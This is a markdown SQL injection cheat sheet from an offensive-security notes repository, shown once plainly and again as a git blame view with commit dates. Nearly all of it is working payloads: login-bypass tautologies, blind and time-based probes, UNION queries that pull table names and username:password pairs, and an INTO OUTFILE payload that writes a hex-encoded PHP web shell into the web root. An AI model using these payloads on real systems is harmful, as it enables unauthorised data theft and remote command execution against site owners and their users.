killchain-compendium/exploit/sqli/sqli.md

# SQL Injection

* [MySQL Comments](https://blog.raw.pm/en/sql-injection-mysql-comment/)

## Finding an Opportunity
* GET parameter
```sh
http://example.com/index.php?id=' or 1=1 -- -
```
* Sometimes an ID or may come first
```sh
http://example.com/index.php?id=10 or 1=1 -- +
http://example.com/index.php?id=10' or '1'='1'-- -
http://example.com/index.php?id=-1' or 1=1 -- -&password=x
```
* Provoke error to gain information
```sh
http://example.com/index.php?id='
```
* **Incase of client side sanitization craft the URL instead of using the form!!!**

## Usage
* Example, terminate string via `'` and resolve via tautology, comment the rest of the string via `--`
```sql
SELECT * FROM users WHERE username = admin AND password := ' and 1=1 -- -
SELECT * FROM users WHERE username = admin AND password := ' or 1=1 --+
```

### Boolean True and False
```sql
SELECT * FROM users WHERE username = admin AND password :=1' or 1 < 2 --+
SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+
```
* Blind boolean base substring fuzzing, one char at a time, by inspecting the return value after each inserted char.
```sql
' UNION SELECT null,null,null where database() like 'da%';-- -
```

### Time based
* Checking input blindly via sleep() function. Count number of cols in this way. If it is successful, the sleep(5) function executes
```sql
' union select sleep(3), null; -- -
```

### Blind injection // Guessing characters
```sh
http://example.com/?id=1' and substr((select database()),1,1) < 105 --+
```
```sh
http://example.com/?id=1' and (ascii(substr((select database(),1,1)) = 115 --+
```
* Function substr(string, start, length)
* sqlmap via `--level=5 --risk=3 --dbms=sqlite --technique=b --dump` 

### Union based
* _First method__ check by order until error occurs
```sql
' order by 1 -- -
' order by 2 -- -
' order by 3 -- -
```
* __Second method__ fuzzing NULL values, followed by fuzzing data types
* Check number of cols
```sql
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
# until the error occurs
```
* Check which one is a string
```sql
' UNION SELECT 'a',NULL,NULL,NULL--
' UNION SELECT NULL,'a',NULL,NULL--
' UNION SELECT NULL,NULL,'a',NULL--
' UNION SELECT NULL,NULL,NULL,'a'--
```
* Retrieve content, for cols and comment two times as an example. Or dump database
```sql
' UNION SELECT NULL,NULL,database(),NULL,NULL from users -- //
' UNION SELECT NULL,username,password,NULL FROM users -- //
```

* Retrieve content by union poking the count and order, afterwards extracting tables via
```sh
0 union select null, null, database()
0 union select null, null, group_concat(table_name) from information_schema.tables where table_schema = 'found_db'
0 union select null, null, group_concat(column_name) from information_schema.columns where table_name = 'found_tablename'
0 union select null, null, group_concat(username, ':', password from found_tablename
```

* [OWASP SQLi Docs](https://www.owasp.org/index.php/SQL_Injection)

### Identify Database 
```sh
id=sqlite_version()
id=@@version # mysql/mssql
id=(SELECT banner FROM v$version) # oracle
```

#### SQL Functions
* Use sql functions to fumble the tables & cols via union
* [source](https://medium.com/@nyomanpradipta120/sql-injection-union-attack-9c10de1a5635)
* Extract tables 
```sql
1' and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema = database() -- -
```
* sqlite specific
```sql
' UNION SELECT sql, sql FROM sqlite_master -- -
```
```sql
(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='usertable')
(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%')
```
* Extract cols
```sh
1' and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema = database() and table_name ='user'-- -
```
* Data from cols
```sql
1' and 1=2 union select 1,group_concat(username,0x3a,password),3,4 from user-- -
```

## Insert
* Insert file through insertion of `system()` or `exec_shell()` and a get parameter
```sql
<cookieID>'into outfile '/var/www/html/shello.php' lines terminated by 0x3c3f706870206563686f20223c7072653e22202e2073797374656d28245f4745545b22636d64225d29202e20223c2f7072653e223b3f3e -- -
```

### Examples
* sqli inside HTTP request to an API. Five values inside select have been discovered before
```HTTP
GET /about/0 UNION select column_name, null,null,null,null from information_schema.columns where table_name = 'user' HTTP/1.1
```
    * Get col names 
    ```HTTP
    GET /about/0 UNION all select group_concat(column_name), null,null,null,null from information_schema.columns where table_name = 'user' HTTP/1.1
    ```
    * Get notes from users by id 
    ```HTTP
    GET /about/0 UNION all select notes, null, null, null, null from users where id = 4711 HTTP/1.1
    ```

## Payloads
* [List](https://github.com/payloadbox/sql-injection-payload-list#generic-sql-injection-payloads)
second commit 2021-08-23 01:13:54 +02:00			`# SQL Injection`

bump 2021-09-08 02:09:14 +02:00			`* [MySQL Comments](https://blog.raw.pm/en/sql-injection-mysql-comment/)`

			`## Finding an Opportunity`
second commit 2021-08-23 01:13:54 +02:00			`* GET parameter`
			```sh
			`http://example.com/index.php?id=' or 1=1 -- -`
			```
bump 2021-09-08 02:09:14 +02:00			`* Sometimes an ID or may come first`
			```sh
			`http://example.com/index.php?id=10 or 1=1 -- +`
			`http://example.com/index.php?id=10' or '1'='1'-- -`
			`http://example.com/index.php?id=-1' or 1=1 -- -&password=x`
			```
second commit 2021-08-23 01:13:54 +02:00			`* Provoke error to gain information`
			```sh
			`http://example.com/index.php?id='`
			```
bump 2021-09-08 02:09:14 +02:00			`* Incase of client side sanitization craft the URL instead of using the form!!!`
second commit 2021-08-23 01:13:54 +02:00
bump 2021-09-08 02:09:14 +02:00			`## Usage`
second commit 2021-08-23 01:13:54 +02:00			* Example, terminate string via `'` and resolve via tautology, comment the rest of the string via `--`
			```sql
			`SELECT * FROM users WHERE username = admin AND password := ' and 1=1 -- -`
			`SELECT * FROM users WHERE username = admin AND password := ' or 1=1 --+`
			```

bump 2021-09-08 02:09:14 +02:00			`### Boolean True and False`
second commit 2021-08-23 01:13:54 +02:00			```sql
			`SELECT * FROM users WHERE username = admin AND password :=1' or 1 < 2 --+`
			`SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+`
			```
bump 2021-10-13 01:17:44 +02:00			`* Blind boolean base substring fuzzing, one char at a time, by inspecting the return value after each inserted char.`
			```sql
			`' UNION SELECT null,null,null where database() like 'da%';-- -`
			```

			`### Time based`
			`* Checking input blindly via sleep() function. Count number of cols in this way. If it is successful, the sleep(5) function executes`
			```sql
			`' union select sleep(3), null; -- -`
			```
second commit 2021-08-23 01:13:54 +02:00
bump 2021-09-08 02:09:14 +02:00			`### Blind injection // Guessing characters`
second commit 2021-08-23 01:13:54 +02:00			```sh
added stuff 2021-09-24 00:54:18 +02:00			`http://example.com/?id=1' and substr((select database()),1,1) < 105 --+`
			```
			```sh
			`http://example.com/?id=1' and (ascii(substr((select database(),1,1)) = 115 --+`
second commit 2021-08-23 01:13:54 +02:00			```
bump 2021-09-08 02:09:14 +02:00			`* Function substr(string, start, length)`
			* sqlmap via `--level=5 --risk=3 --dbms=sqlite --technique=b --dump`
second commit 2021-08-23 01:13:54 +02:00
			`### Union based`
added stuff 2021-09-24 00:54:18 +02:00			`* _First method__ check by order until error occurs`
			```sql
			`' order by 1 -- -`
			`' order by 2 -- -`
			`' order by 3 -- -`
			```
			`* __Second method__ fuzzing NULL values, followed by fuzzing data types`
second commit 2021-08-23 01:13:54 +02:00			`* Check number of cols`
			```sql
			`' UNION SELECT NULL--`
			`' UNION SELECT NULL,NULL--`
			`' UNION SELECT NULL,NULL,NULL--`
			`# until the error occurs`
			```
			`* Check which one is a string`
			```sql
			`' UNION SELECT 'a',NULL,NULL,NULL--`
			`' UNION SELECT NULL,'a',NULL,NULL--`
			`' UNION SELECT NULL,NULL,'a',NULL--`
			`' UNION SELECT NULL,NULL,NULL,'a'--`
			```
			`* Retrieve content, for cols and comment two times as an example. Or dump database`
			```sql
			`' UNION SELECT NULL,NULL,database(),NULL,NULL from users -- //`
			`' UNION SELECT NULL,username,password,NULL FROM users -- //`
			```

bump 2021-10-13 01:17:44 +02:00			`* Retrieve content by union poking the count and order, afterwards extracting tables via`
			```sh
			`0 union select null, null, database()`
			`0 union select null, null, group_concat(table_name) from information_schema.tables where table_schema = 'found_db'`
			`0 union select null, null, group_concat(column_name) from information_schema.columns where table_name = 'found_tablename'`
			`0 union select null, null, group_concat(username, ':', password from found_tablename`
			```

second commit 2021-08-23 01:13:54 +02:00			`* [OWASP SQLi Docs](https://www.owasp.org/index.php/SQL_Injection)`

bump 2021-09-08 02:09:14 +02:00			`### Identify Database`
			```sh
			`id=sqlite_version()`
			`id=@@version # mysql/mssql`
			`id=(SELECT banner FROM v$version) # oracle`
			```

added sql union via functions 2021-09-02 01:19:53 +02:00			`#### SQL Functions`
			`* Use sql functions to fumble the tables & cols via union`
			`* [source](https://medium.com/@nyomanpradipta120/sql-injection-union-attack-9c10de1a5635)`
			`* Extract tables`
			```sql
			`1' and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema = database() -- -`
			```
bump 2021-09-08 02:09:14 +02:00			`* sqlite specific`
			```sql
added stuff 2021-09-24 00:54:18 +02:00			`' UNION SELECT sql, sql FROM sqlite_master -- -`
			```
			```sql
bump 2021-09-08 02:09:14 +02:00			`(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='usertable')`
			`(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%')`
			```
added sql union via functions 2021-09-02 01:19:53 +02:00			`* Extract cols`
			```sh
			`1' and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema = database() and table_name ='user'-- -`
			```
			`* Data from cols`
			```sql
			`1' and 1=2 union select 1,group_concat(username,0x3a,password),3,4 from user-- -`
			```

bump 2022-02-14 23:22:18 +01:00			`## Insert`
			* Insert file through insertion of `system()` or `exec_shell()` and a get parameter
			```sql
			`<cookieID>'into outfile '/var/www/html/shello.php' lines terminated by 0x3c3f706870206563686f20223c7072653e22202e2073797374656d28245f4745545b22636d64225d29202e20223c2f7072653e223b3f3e -- -`
			```

additions 2021-09-29 01:42:26 +02:00			`### Examples`
			`* sqli inside HTTP request to an API. Five values inside select have been discovered before`
			```HTTP
			`GET /about/0 UNION select column_name, null,null,null,null from information_schema.columns where table_name = 'user' HTTP/1.1`
			```
			`* Get col names`
			```HTTP
			`GET /about/0 UNION all select group_concat(column_name), null,null,null,null from information_schema.columns where table_name = 'user' HTTP/1.1`
			```
			`* Get notes from users by id`
			```HTTP
			`GET /about/0 UNION all select notes, null, null, null, null from users where id = 4711 HTTP/1.1`
			```

second commit 2021-08-23 01:13:54 +02:00			`## Payloads`
			`* [List](https://github.com/payloadbox/sql-injection-payload-list#generic-sql-injection-payloads)`
bump 2022-02-07 23:37:05 +01:00